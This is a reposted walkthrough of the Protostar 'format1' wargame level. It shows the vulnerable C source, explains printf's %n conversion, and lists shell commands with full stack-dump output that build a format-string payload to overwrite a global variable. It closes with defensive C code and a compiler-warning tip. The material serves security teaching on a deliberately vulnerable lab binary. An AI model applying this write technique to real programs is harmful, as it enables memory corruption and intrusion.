
Protostarformat1

About

This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
    printf(string);   /* user input is used directly as the format string */

    if(target) {
        printf("you have modified the target :)\n");
    }
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
}

I could not do this level at first: when I wrote C before, I rarely looked into format strings, so I had never come across %n. A short introduction to %n:
The %n conversion stores the number of characters output so far into a variable, as in this example:
    int slen;
    printf("hello world%n", &slen);
    After execution the variable slen holds the value 11.

Now look at printf(string) in this level. It is not the same as printf("%s", string), and that is exactly where the bug is: if %x directives are appended to the input, each one is treated as a conversion and printf reads the next word off the stack as if it were an argument.
First, obtain the address of target:
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g         O .bss     00000004                            target

然后須在堆棧中找到執(zhí)行賦值動(dòng)作的位置,可用%x來填充堆棧的內(nèi)容:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*150+"%x"')
aaaaaaaa804960c.bffff628.8048469.b7fd8304.b7fd7ff4.bffff628.8048435.bffff7f1.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6a8.b7eadc76.2.bffff6d4.bffff6e0.b7fe1848.bffff690.ffffffff.b7ffeff4.804824d.1.bffff690.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6a8.1e6dfbd.2bb2c9ad.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6d4.8048450.8048440.b7ff1040.bffff6cc.b7fff8f8.2.bffff7e7.bffff7f1.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7cb.1f.bffffff2.f.bffff7db.0.0.0.19000000.5f0430f3.ed617f05.8671f725.69f2e525.363836.0.2e000000.726f662f.3174616d.61616100.61616161.2e782561.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e

By eye it is at roughly the 128th %x; let's confirm:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*128+"%x"')
aaaaaaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fa7bb769.d02f2179.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.c000000.ab329b49.980b02cb.973cca28.695fb6c8.363836.0.0.662f2e00.616d726f.61003174.61616161

Replace the first 4 bytes with the address of target:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print " \x38\x96\x04\x08aaaa" + "%x."*128+"%x"')
8aaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.6a958dd0.40c11bc0.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.86000000.b6399ac7.1f57cabc.3bd68bc6.69c7f777.363836.0.0.662f2e00.616d726f.38003174.61080496
The output shows a one-byte misalignment, which needs adjusting:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%x"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fae225a2.d0b6b3b2.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.40000000.628ccb6c.1f6e8287.90ab45aa.6922104d.363836.0.0.662f2e00.616d726f.61003174.8049638

Good, the position is located; now just replace the final %x with %n:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%n"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.2f09ffa.28a409ea.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.89000000.3f3cec1e.c342fe8e.7223fa6a.699b71e8.363836.0.0.662f2e00.616d726f.61003174.you have modified the target :)
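The level above turns on two things: %n writes the running byte count to whatever address sits in the argument slot it consumes, and vuln() hands user input to printf as the format. As an added example (not from the writeup or the Protostar sources; all function names are mine), the C below reproduces the %n count from the "hello world" snippet, adds a check that rejects any format string carrying an n conversion (the kind of guard a hardened libc applies at runtime), and shows the one-line fix for vuln().

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the Protostar level: %n stores the number of
 * bytes emitted so far into the int its argument points to. For the text's
 * "hello world" this returns 11. The format here is a literal, so it is safe. */
int bytes_written_before_n(const char *text)
{
    int written = -1;
    char buf[256];
    snprintf(buf, sizeof buf, "%s%n", text, &written);
    return written;
}

/* Defensive check: walk the directives of fmt and report whether any
 * conversion is 'n'. "%%" is a literal percent; flags, width, precision,
 * positional "$" and length modifiers are skipped so "%10n", "%hhn" and
 * "%2$n" are all caught, not just a bare "%n". */
bool format_has_n_directive(const char *fmt)
{
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                      /* "%%" */
            continue;
        while (*p && strchr("-+ #0123456789.*$", *p))
            p++;                            /* flags, width, precision */
        while (*p && strchr("hlLqjzt", *p))
            p++;                            /* length modifiers */
        if (*p == 'n')
            return true;
        if (*p == '\0')                     /* lone trailing '%' */
            break;
    }
    return false;
}

/* The one-line fix for vuln(): user text is passed as data, never as the
 * format, so "%x" and "%n" inside it are copied literally. Renders into out
 * rather than stdout so the result can be inspected; returns the length. */
int echo_safe(char *out, size_t cap, const char *user)
{
    return snprintf(out, cap, "%s", user);
}
```

Compiling the original vuln() with -Wformat-security flags the printf(string) call at build time, which is the cheapest place to catch this bug.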



Reposted from: http://www.aaarwkj.com/article6/pegjig.html
